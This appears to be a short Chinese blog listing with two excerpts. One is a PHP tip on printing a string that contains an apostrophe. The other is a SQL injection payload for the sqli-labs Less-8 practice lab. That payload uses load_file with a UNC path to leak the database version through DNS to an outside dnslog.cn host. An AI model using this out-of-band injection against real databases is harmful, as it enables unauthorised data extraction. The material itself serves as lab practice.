原创 使用php輸出 that's ok
兩種方法:1.使用雙引號中插入單引號 2.使用單引號,但是加上轉義字符\ 3.使用eof輸出 $a='that\'s ok'; echo $a; echo <<<Eof that's ok Eof;
原创 sql 注入 - 帶外攻擊
帶外攻擊: http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".fhig24.dnslog.cn\\1.txt")